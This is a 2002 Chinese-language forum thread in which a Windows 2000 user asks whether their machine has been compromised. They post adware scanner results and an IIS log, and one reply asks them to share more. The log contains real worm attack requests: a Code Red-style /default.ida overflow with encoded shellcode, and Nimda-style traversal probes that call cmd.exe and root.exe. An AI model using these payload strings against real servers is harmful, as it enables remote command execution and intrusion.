【求助】是否被入侵?



贊助商連結


Raccoon
2002-11-13, 09:08 PM
使用WIN2K 更新至SP3,專門驢子用。
這幾天異常,查了一下,發現用iparmor掃出下面訊息

「Scanning registry is over.
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\free software.url
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\privacy policy.url
Find ad procedure: c:\documents and settings\administrator\「開始」功能表\programs\radiate\radiate web site.url
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@doubleclick[2].txt
Doubleclick Spyware Cookie found in c:\documents and settings\administrator\cookies\administrator@doubleclick[2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@fastclick[1].txt
Find ad procedure: c:\documents and settings\administrator\cookies\[email protected][2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@hitbox[2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@lop[1].txt
Find ad procedure: c:\documents and settings\administrator\cookies\[email protected][1].txt
Valueclick Spyware Cookie found in c:\documents and settings\administrator\cookies\[email protected][2].txt
Find ad procedure: c:\documents and settings\administrator\cookies\administrator@valueclick[1].txt
Valueclick Spyware Cookie found in c:\documents and settings\administrator\cookies\administrator@valueclick[1].txt
Find ad procedure: c:\program files\common files\everad shared\everadsv.dll
Find ad procedure: c:\program files\common files\everad shared\everadsv.exe
Find ad procedure: c:\winnt\system32\adimage.dll
Find ad procedure: c:\winnt\system32\htmdeng.exe
Find ad procedure: c:\winnt\system32\ipcclient.dll
Find ad procedure: c:\winnt\system32\msipcsv.exe
Find ad procedure: c:\winnt\system32\tfde.dll」
IIS LOG檔

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-11-13 00:09:59
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-11-13 00:09:59 217.34.54.146 - 61.64.79.180 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -
2002-11-13 01:26:19 61.64.93.80 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 03:14:17 192.168.1.12 - 192.168.1.5 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2002-11-13 03:14:17 192.168.1.12 - 192.168.1.5 80 PROPFIND /movie - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2002-11-13 06:37:14 61.167.241.24 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 06:37:24 61.167.241.24 - 61.64.79.180 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-13 06:37:35 61.167.241.24 - 61.64.79.180 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:21 61.54.131.162 - 61.64.79.180 80 GET /scripts/root.exe /c+dir 404 -
2002-11-13 07:07:21 61.54.131.162 - 61.64.79.180 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-13 07:07:23 61.54.131.162 - 61.64.79.180 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:23 61.54.131.162 - 61.64.79.180 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:24 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:24 61.54.131.162 - 61.64.79.180 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:25 61.54.131.162 - 61.64.79.180 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:25 61.54.131.162 - 61.64.79.180 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 -
2002-11-13 07:07:27 61.54.131.162 - 61.64.79.180 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:27 61.54.131.162 - 61.64.79.180 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:28 61.54.131.162 - 61.64.79.180 80 GET /scripts/..嶸../winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:28 61.54.131.162 - 61.64.79.180 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:30 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-11-13 07:07:31 61.54.131.162 - 61.64.79.180 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


請問是否凶多吉少。
ddd

贊助商連結


shauronglu
2002-11-14, 01:41 PM
貼過來聊吧